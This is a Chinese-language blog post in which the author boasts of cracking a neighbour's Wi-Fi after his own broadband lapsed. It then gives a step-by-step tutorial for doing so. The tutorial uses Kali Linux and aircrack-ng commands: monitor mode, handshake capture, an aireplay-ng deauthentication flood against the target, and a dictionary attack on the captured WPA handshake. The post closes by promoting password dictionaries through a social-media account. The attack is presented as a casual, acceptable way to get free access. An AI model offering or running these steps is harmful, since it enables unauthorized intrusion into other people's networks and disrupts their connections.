自己家的宽带最近到期了,但是对于一个程序猿来说,断网是不能忍受的,于是自己就开始搭建自己的环境,去破解 邻居家的无线 ,最终悄悄地找到了无线密码,下面就把自己破解的方法分享给大家!
首先给大家分享一段视频:
3分钟教你破解无线密码_腾讯视频
1.下载kali linux
https://www.kali.org/downloads/
2.下载一个软碟通
https://cn.ultraiso.net/xiazai.html
3.安装软碟通,安装完成后可以自己的下载的kali linux系统写进自己的优盘里面,具体的写入教程大家可以去百度。
4.然后将u盘插进自己的电脑,重启电脑,进入按快捷启动键shift+f11或者其他的,根据自己的电脑型号。
5.当我们进入到kali linux系统后,这个系统自己安装的破解无线 的工具,首先 打开终端,
⑴开启无线网卡的monitor模式: 因为会有一些进程影响到我们模式的开启,所以使用下面这条命令结束受影响的进程
airmon-ng check kill
可以看到运行后,进程被关闭了
(2)使用iwconfig命令查看自己的无线网卡的命令,可以看到我的 电脑是wlan0
iwconfig查看自己网卡
(3)开启 monitor模式,命令:start后面记得要跟上自己的网卡名称
airmon-ng start wlan0
开启monitor模式
再次使用iwconfig查看,可以看到自己的网卡名称变为wlan0mon此时网卡处于 monitor模式
iwconfig查看自己网卡名称
(4)扫描无线 热点,并且抓包,我们需要记下目标的mac地址即bssid和信道ch
airodump-ng wlan2mon
扫描无线
(5)使用airodump-ng 工具抓包,命令格式如下:
airodump-ng -w 包保存的路径及名字 -c 信道 wlan0mon
如上图显示,目标Tenda的信道为6,下面生成的数据包
airodump-ng -w /root/ch6.txt -c 6 wlan0mon
(6)这样抓包比较难,只有等到有人重新连接热点了,才能抓到握手包,程序员是不会让电脑浪费自己时间的,这时候我们可以 :
另外开一个终端,使用aireplay-ng 泛洪攻击加速获取握手数据包,命令格式如下:
aireplay-ng --deaut 10 -a 目标mac -c 本机mac wlan2mon
目标mac地址:就是BSSID属性显示的
aireplay-ng --deaut 10 -a C8:3A:35:36:24:28 -c B8:86:87:57:4A:D7
加速握手包的获取
(7)切换到运行抓包的终端查看,下面方框出现[ WPA handshake:C8:3A:35:36:24:28 ”表示获取到了握手包,如果没有出现可能是因为目标wifi目前还没有任何设备连接,需要我们 继续等待。
抓包
(8)当我们抓到包后,我们就可以使用字典对其进行破解了
使用命令aircrack-ng -w 字典 包文件名字
我的字典文件存放在/root 目录下面,名为skf.txt,具体命令如下,
aircrak-ng -w /root/skf.txt /root/ch6-01.cap
命令执行的时候会出现“index number of network?
我们 只需要 输入1即可确认开始暴力破解
暴力破解
如需高效率的破解字典,可以关注公众号私信“密码字典”。
也希望大家可以互相分享自己的学习经验,欢迎来稿!
网友评论